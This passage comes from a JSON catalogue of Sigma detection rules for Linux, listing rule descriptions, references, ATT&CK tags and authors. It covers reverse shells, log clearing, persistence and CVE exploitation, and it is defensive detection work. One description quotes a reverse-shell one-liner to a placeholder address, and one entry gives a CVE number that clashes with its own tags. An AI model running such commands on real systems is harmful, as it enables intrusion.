"https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", - "http://pastebin.com/FtygZ1cg", - "https://artkond.com/2017/03/23/pivoting-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2017/08/21", - "filename": "lnx_shell_susp_commands.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious log entries in Linux log files", - "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", - "value": "Suspicious Log Entries", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2017/03/25", - "filename": "lnx_shell_susp_log_entries.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", - "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", - "value": "Suspicious Reverse Shell Command Line", - "meta": { - "refs": [ - "https://alamot.github.io/reverse_shells/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2019/04/02", - "filename": "lnx_shell_susp_rev_shells.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects space after filename", - "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", - "value": "Space After Filename", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1064", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2020/06/17", - "filename": "lnx_space_after_filename_.yml", - "author": "\u00d6mer G\u00fcnal", - "level": "low", - "falsepositive": [ - "Typos" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", - "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", - "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin", - "meta": { - "refs": [ - "https://www.openwall.com/lists/oss-security/2019/10/14/1", - "https://access.redhat.com/security/cve/cve-2019-14287", - "https://twitter.com/matthieugarin/status/1183970598210412546", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" - ], - "creation_date": "2019/10/15", - "filename": "lnx_sudo_cve_2019_14287_user.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious command with /dev/tcp", - "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", - "value": "Suspicious Use of /dev/tcp", - "meta": { - "refs": [ - "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", - "https://book.hacktricks.xyz/shells/shells/linux", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" - ], - "tags": [ - "attack.reconnaissance" - ], - "creation_date": "2021/12/10", - "filename": "lnx_susp_dev_tcp.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious command sequence that JexBoss", - "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", - "value": "JexBoss Command Sequence", - "meta": { - "refs": [ - "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2017/08/24", - "filename": "lnx_susp_jexboss.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", - "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", - "value": "Symlink Etc Passwd", - "meta": { - "refs": [ - "https://www.qualys.com/2021/05/04/21nails/21nails.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" - ], - "tags": [ - "attack.t1204.001", - "attack.execution" - ], - "creation_date": "2019/04/05", - "filename": "lnx_symlink_etc_passwd.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects the creation of doas.conf file in linux host platform.", - "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", - "value": "Linux Doas Conf File Creation", - "meta": { - "refs": [ - "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", - "https://www.makeuseof.com/how-to-install-and-use-doas/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2022/01/20", - "filename": "file_create_lnx_doas_conf_creation.yml", - "author": "Sittikorn S, Teoderick Contreras", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", - "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", - "value": "Persistence Via Cron Files", - "meta": { - "refs": [ - "https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_cron_files.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ], - "creation_date": "2021/10/15", - "filename": "file_create_lnx_persistence_cron_files.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Any legitimate cron file." - ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", - "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", - "value": "Persistence Via Sudoers Files", - "meta": { - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_persistence_sudoers_files.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.003" - ], - "creation_date": "2022/07/05", - "filename": "file_create_lnx_persistence_sudoers_files.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Creation of legitimate files in sudoers.d folder part of administrator work" - ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", - "uuid": "c0239255-822c-4630-b7f1-35362bcb8f44", - "value": "Triple Cross eBPF Rootkit Default LockFile", - "meta": { - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_lock_file.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/05", - "filename": "file_create_lnx_triple_cross_rootkit_lock_file.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", - "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", - "value": "Triple Cross eBPF Rootkit Default Persistence", - "meta": { - "refs": [ - "https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_triple_cross_rootkit_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1053.003" - ], - "creation_date": "2022/07/05", - "filename": "file_create_lnx_triple_cross_rootkit_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "file_create", - "logsource.product": "linux" - } - }, - { - "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", - "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", - "value": "Multiple Modsecurity Blocks", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/modsecurity/modsec_mulitple_blocks.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499" - ], - "creation_date": "2017/02/28", - "filename": "modsec_mulitple_blocks.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Vulnerability scanners", - "Frequent attacks if system faces Internet" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", - "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", - "value": "Linux Reverse Shell Indicator", - "meta": { - "refs": [ - "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" - ], - "tags": "No established tags", - "creation_date": "2021/10/16", - "filename": "net_connection_lnx_back_connect_shell_dev.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "network_connection", - "logsource.product": "linux" - } - }, - { - "description": "Detects process connections to a Monero crypto mining pool", - "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", - "value": "Linux Crypto Mining Pool Connections", - "meta": { - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" - ], - "tags": "No established tags", - "creation_date": "2021/10/26", - "filename": "net_connection_lnx_crypto_mining_indicators.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of crypto miners" - ], - "logsource.category": "network_connection", - "logsource.product": "linux" - } - }, - { - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", - "value": "Communication To Ngrok Tunneling Service - Linux", - "meta": { - "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", - "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" - ], - "creation_date": "2022/11/03", - "filename": "net_connection_lnx_ngrok_tunnel.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of ngrok" - ], - "logsource.category": "network_connection", - "logsource.product": "linux" - } - }, - { - "description": "Detects relevant ClamAV messages", - "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", - "value": "Relevant ClamAV Message", - "meta": { - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_clamav.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.001" - ], - "creation_date": "2017/03/01", - "filename": "lnx_clamav.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects disabling security tools", - "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", - "value": "Disabling Security Tools - Builtin", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_security_tools_disabling_syslog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2020/06/17", - "filename": "lnx_security_tools_disabling_syslog.yml", - "author": "\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects exploitation attempt using public exploit code for CVE-2018-15473", - "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", - "value": "SSHD Error Message CVE-2018-15473", - "meta": { - "refs": [ - "https://github.com/Rhynorater/CVE-2018-15473-Exploit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_ssh_cve_2018_15473.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1589" - ], - "creation_date": "2017/08/24", - "filename": "lnx_ssh_cve_2018_15473.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "uuid": "fc947f8e-ea81-4b14-9a7b-13f888f94e18", - "value": "Failed Logins with Different Accounts from Single Source - Linux", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_failed_logons_single_source.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2017/02/16", - "filename": "lnx_susp_failed_logons_single_source.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious session with two users present", - "uuid": "1edd77db-0669-4fef-9598-165bda82826d", - "value": "Guacamole Two Users Sharing Session Anomaly", - "meta": { - "refs": [ - "https://research.checkpoint.com/2020/apache-guacamole-rce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_guacamole.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ], - "creation_date": "2020/07/03", - "filename": "lnx_susp_guacamole.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", - "value": "Suspicious Named Error", - "meta": { - "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_named.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2018/02/20", - "filename": "lnx_susp_named.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", - "value": "Suspicious OpenSSH Daemon Error", - "meta": { - "refs": [ - "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_ssh.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/06/30", - "filename": "lnx_susp_ssh.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", - "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", - "value": "Suspicious VSFTPD Error Messages", - "meta": { - "refs": [ - "https://github.com/dagwieers/vsftpd/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/other/lnx_susp_vsftp.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2017/07/05", - "filename": "lnx_susp_vsftp.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "linux" - } - }, - { - "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", - "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", - "value": "Scheduled Task/Job At", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_at_command.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1053.002" - ], - "creation_date": "2020/10/06", - "filename": "proc_creation_lnx_at_command.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", - "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", - "value": "Decode Base64 Encoded Text", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2020/10/19", - "filename": "proc_creation_lnx_base64_decode.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", - "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", - "value": "Linux Base64 Encoded Pipe to Shell", - "meta": { - "refs": [ - "https://github.com/arget13/DDexec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2022/07/26", - "filename": "proc_creation_lnx_base64_execution.yml", - "author": "pH-T", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", - "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", - "value": "Linux Base64 Encoded Shebang In CLI", - "meta": { - "refs": [ - "https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html", - "https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_base64_shebang_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the usage of the unsafe bpftrace option", - "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", - "value": "BPFtrace Unsafe Option Usage", - "meta": { - "refs": [ - "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", - "https://bpftrace.org/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.004" - ], - "creation_date": "2022/02/11", - "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the unsafe option" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", - "uuid": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", - "value": "Cat Sudoers", - "meta": { - "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1592.004" - ], - "creation_date": "2022/06/20", - "filename": "proc_creation_lnx_cat_sudoers.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", - "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", - "value": "Remove Immutable File Attribute", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.002" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_chattr_immutable_removal.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrator interacting with immutable files (e.g. for instance backups)." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", - "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", - "value": "Clear Linux Logs", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_lnx_clear_logs.yml", - "author": "\u00d6mer G\u00fcnal, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate administration activities" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", - "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", - "value": "Commands to Clear or Remove the Syslog", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_clear_syslog.yml", - "author": "Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "high", - "falsepositive": [ - "Log rotation." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "uuid": "ec127035-a636-4b9a-8555-0efd4e59f316", - "value": "Clipboard Collection with Xclip Tool", - "meta": { - "refs": [ - "https://www.packetlabs.net/posts/clipboard-data-security/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml" - ], - "tags": [ - "attack.collection", - "attack.t1115" - ], - "creation_date": "2021/10/15", - "filename": "proc_creation_lnx_clipboard_collection.yml", - "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "low", - "falsepositive": [ - "Legitimate usage of xclip tools." - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", - "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", - "value": "Remove Scheduled Cron Task/Job", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_crontab_removal.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects command line parameters or strings often used by crypto miners", - "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", - "value": "Linux Crypto Mining Indicators", - "meta": { - "refs": [ - "https://www.poolwatch.io/coin/monero", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" - ], - "tags": "No established tags", - "creation_date": "2021/10/26", - "filename": "proc_creation_lnx_crypto_mining.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of crypto miners" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", - "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", - "value": "Curl Usage on Linux", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/09/15", - "filename": "proc_creation_lnx_curl_usage.yml", - "author": "Nasreddine Bencherchali", - "level": "low", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", - "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", - "value": "Atlassian Confluence CVE-2022-26134", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" - ], - "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059", - "cve.2022.26134" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } - }, - { - "description": "Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective", - "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", - "value": "Apache Spark Shell Command Injection - ProcessCreation", - "meta": { - "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", - "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", - "https://github.com/apache/spark/pull/36315/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2022.33891" - ], - "creation_date": "2022/07/20", - "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "linux" - } 